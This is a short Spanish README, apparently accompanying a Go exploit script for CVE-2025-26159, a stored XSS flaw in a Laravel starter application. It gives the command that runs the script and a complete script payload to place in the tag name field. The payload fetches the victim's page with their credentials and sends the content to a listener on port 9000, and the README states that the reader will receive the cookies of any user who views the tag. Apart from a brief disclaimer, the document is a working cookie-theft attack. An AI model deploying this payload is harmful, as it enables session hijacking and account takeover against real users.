
# Script de explotación basado en Go para CVE-2025-26159 que decodifica, filtra y extrae cookies de aplicaciones Laravel mediante inyección de payload XSS almacenado.
Este script solo puede utilizarse en entornos autorizados donde se haya otorgado permiso explícito. El autor no es responsable de ningún uso indebido, daño o consecuencia derivada del uso de este script.
Este script decodifica, filtra y extrae cookies como parte de la explotación de CVE-2025-26159.
Para comprender los pasos de explotación, consulta esta publicación en mi blog.
go run CVE-2025-26159.go
En el campo de nombre de etiqueta de laravel starter agrega este payload:
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
Después de que un usuario visite la página de detalle de la etiqueta maliciosa, recibirás sus cookies.